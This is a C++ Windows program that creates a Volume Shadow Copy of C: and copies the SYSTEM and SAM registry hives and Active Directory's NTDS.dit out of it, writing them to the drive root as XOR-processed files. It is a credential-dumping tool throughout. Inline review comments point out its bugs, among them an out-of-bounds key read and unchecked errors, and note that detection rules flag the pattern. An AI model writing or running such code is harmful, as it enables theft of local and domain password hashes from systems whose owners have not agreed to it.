#pragma once
#include "main.h"
// Copies the file at inputFilePath to outputFilePath through a 4 KiB buffer, XOR-ing
// every byte with xorKey on the way, using raw Win32 handles (CreateFile/ReadFile/WriteFile).
//   inputFilePath   source path; opened read-only with FILE_SHARE_READ, must already exist
//   outputFilePath  destination path; opened with CREATE_ALWAYS, so an existing file is overwritten
//   xorKey          array parameter, which decays to char* — the key length is not available
//                   inside this function (see the note at the XOR loop)
// Returns nothing. A failure to open either file is reported on std::wcerr and the
// function returns early; ReadFile/WriteFile failures are not reported at all.
void CopyShadowFiles(std::wstring inputFilePath, std::wstring outputFilePath, char xorKey[])
{
//std::wstring inputFilePath = L"\\Windows\\system32\\config\\SYSTEM";
//std::wstring outputFilePath = L"C:\\SYSTEM.xor"; // Replace with your output path
// Open the input file using CreateFile
HANDLE hFile = CreateFile(inputFilePath.c_str(),
GENERIC_READ, FILE_SHARE_READ, nullptr, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, nullptr);
if (hFile == INVALID_HANDLE_VALUE) {
std::wcerr << L"Error opening input file: " << inputFilePath << L" " << GetLastError() << std::endl;
return;
}
// Open the output file (no sharing; CREATE_ALWAYS truncates an existing file)
HANDLE hOutFile = CreateFile(outputFilePath.c_str(),
GENERIC_WRITE, 0, nullptr, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, nullptr);
if (hOutFile == INVALID_HANDLE_VALUE) {
std::wcerr << L"Error opening output file: " << outputFilePath << L" " << GetLastError() << std::endl;
CloseHandle(hFile); // release the input handle before the early return
return;
}
// Read and XOR bytes
DWORD bytesRead, bytesWritten;
char buffer[4096]; // Buffer for reading and writing
// The loop stops on a ReadFile failure or on a zero-length read (end of file for a
// synchronous handle); the two cases are not told apart, GetLastError is not consulted.
while (ReadFile(hFile, buffer, sizeof(buffer), &bytesRead, nullptr) && bytesRead > 0) {
// XOR each byte with key
// NOTE(review): xorKey is a pointer parameter, so sizeof(xorKey) is sizeof(char*)
// (8 on a 64-bit build), not the number of key bytes. The only caller in this file
// passes a one-element array, so i % sizeof(xorKey) indexes past its end: an
// out-of-bounds read (undefined behaviour) whose result depends on whatever happens
// to follow the array in memory rather than on the key.
for (DWORD i = 0; i < bytesRead; ++i) {
buffer[i] ^= xorKey[i % sizeof(xorKey)];
}
// Write the XOR-ed data to the output file
// The return value and bytesWritten are ignored, so a short or failed write goes unnoticed.
WriteFile(hOutFile, buffer, bytesRead, &bytesWritten, nullptr);
}
// Close the files
CloseHandle(hFile);
CloseHandle(hOutFile);
// Printed unconditionally once the loop exits, even if a read or write failed.
std::wcout << L"File processed and saved to: " << outputFilePath << std::endl;
}
// https://github.com/albertony/vss/
// Program entry point; argc/argv are not used.
// Sequence: initialise COM, create a VSS backup-components object, add the C: volume to
// a snapshot set, create the snapshot, then hand the snapshot's device path to
// CopyShadowFiles for three fixed paths. Every HRESULT from the COM/VSS calls below is
// discarded, so the program carries on — and returns 0 — whether or not a step
// succeeded; the status fetched from QueryStatus into hrReturned is never examined.
// Three system("pause") calls block on a keypress between phases.
int main(int argc, char** argv) {
std::wcout << L"Initializing COM context" << std::endl;
// Apartment-threaded COM with OLE1/DDE support disabled. Result not checked.
CoInitializeEx(NULL, COINIT_APARTMENTTHREADED | COINIT_DISABLE_OLE1DDE);
// Process-wide COM security, set before the first VSS call: packet-privacy
// authentication, impersonate-level impersonation, dynamic cloaking. Result not checked.
CoInitializeSecurity(
NULL, // Allow *all* VSS writers to communicate back!
-1, // Default COM authentication service
NULL, // Default COM authorization service
NULL, // reserved parameter
RPC_C_AUTHN_LEVEL_PKT_PRIVACY, // Strongest COM authentication level
RPC_C_IMP_LEVEL_IMPERSONATE, // Minimal impersonation abilities
NULL, // Default COM authentication settings
EOAC_DYNAMIC_CLOAKING, // Cloaking
NULL // Reserved parameter
);
std::wcout << L"Creating VssBackupComponent object" << std::endl;
// Runs "pause" through the command processor; blocks until a key is pressed.
system("pause");
IVssBackupComponentsPtr m_pVssObject; // COM smart pointer, presumably declared via main.h (not visible here)
//SnapshotSetInfo m_latestSnapshotSet;
VSS_ID snapSetId;
// Backup-components setup. None of these return values is checked; if
// CreateVssBackupComponents fails, m_pVssObject is still dereferenced on the next line.
CreateVssBackupComponents(&m_pVssObject);
m_pVssObject->InitializeForBackup();
m_pVssObject->SetContext(VSS_CTX_FILE_SHARE_BACKUP);
m_pVssObject->SetBackupState(true, true, VSS_BT_FULL, false);
m_pVssObject->StartSnapshotSet(&snapSetId);
//snapSetIdString = Guid2WString(snapSetId);
std::wcout << L"Adding volumes to shadow set" << std::endl;
// Add volumes to the shadow set
//for (size_t i = 0; i < volumeList.size(); ++i)
//{
//wstring volume = volumeList[i];
// Only the C: volume is added; the loop over a volume list is left commented out.
// GetUniqueVolumeNameForPath, Guid2WString and the unqualified wstring presumably come
// from main.h — confirm.
wstring volume = GetUniqueVolumeNameForPath(L"c:");
VSS_ID snapshotId;
// C-style cast drops the const from c_str(); presumably because AddToSnapshotSet takes a non-const LPWSTR.
m_pVssObject->AddToSnapshotSet((LPWSTR)volume.c_str(), GUID_NULL, &snapshotId);
wstring snapshotIdString = Guid2WString(snapshotId);
//m_latestSnapshotSet.snapshots.push_back(SnapshotInfo{ snapshotId, snapshotIdString });
//}
std::wcout << L"Snapshot ID" << snapshotIdString << std::endl; // no separator between label and id
std::wcout << L"Creating snapshot and wait a bit..." << std::endl;
system("pause");
IVssAsyncPtr pAsync;
// DoSnapshotSet is asynchronous; Wait blocks until it completes. The completion
// status is copied into hrReturned and then never read, so a failed snapshot is
// not detected here.
m_pVssObject->DoSnapshotSet(&pAsync);
pAsync->Wait();
HRESULT hrReturned = S_OK;
pAsync->QueryStatus(&hrReturned, NULL);
/*for (size_t i = 0; i < m_latestSnapshotSet.snapshots.size(); ++i)
{*/
// Get shadow copy device (if the snapshot is there)
VSS_SNAPSHOT_PROP vssSnapProps;
m_pVssObject->GetSnapshotProperties(snapshotId, &vssSnapProps);
// Automatically call VssFreeSnapshotProperties on this structure at the end of scope
CAutoSnapPointer snapAutoCleanup(&vssSnapProps);
//m_latestSnapshotSet.snapshots[i].deviceName = vssSnapProps.m_pwszSnapshotDeviceObject;
// Device path of the new shadow copy, used as the prefix for the copies below.
// If GetSnapshotProperties failed (unchecked), m_pwszSnapshotDeviceObject is
// uninitialised and this constructor reads it anyway.
std::wstring shadowDevice(vssSnapProps.m_pwszSnapshotDeviceObject);
std::wcout << shadowDevice << std::endl;
//}
std::wcout << L"Snapshot complete!" << std::endl;
std::wcout << L"Copying shadow files..." << std::endl;
system("pause");
// *
// Single-byte key of 0x00. XOR with zero is the identity, so the intended result is
// a plain copy; CopyShadowFiles, however, uses sizeof of its pointer parameter as the
// index modulus, so it reads past this one-byte array (see the note there).
char key[] = { 0x00 };
// Sources are read through the shadow device rather than the live paths; the copies
// land in the root of C:. SAM/SYSTEM and NTDS.dit are credential stores, and a fresh
// shadow copy followed by reads of these paths is a pattern endpoint detection rules
// commonly flag.
CopyShadowFiles(shadowDevice + L"\\Windows\\system32\\config\\SYSTEM", L"C:\\SYSTEM.xor", key);
CopyShadowFiles(shadowDevice + L"\\Windows\\system32\\config\\SAM", L"C:\\SAM.xor", key);
CopyShadowFiles(shadowDevice + L"\\Windows\\NTDS\\NTDS.dit", L"C:\\NTDS.xor", key);
std::wcout << L"Done!" << std::endl;
// Always 0, even when a VSS step or a copy failed.
return 0;
}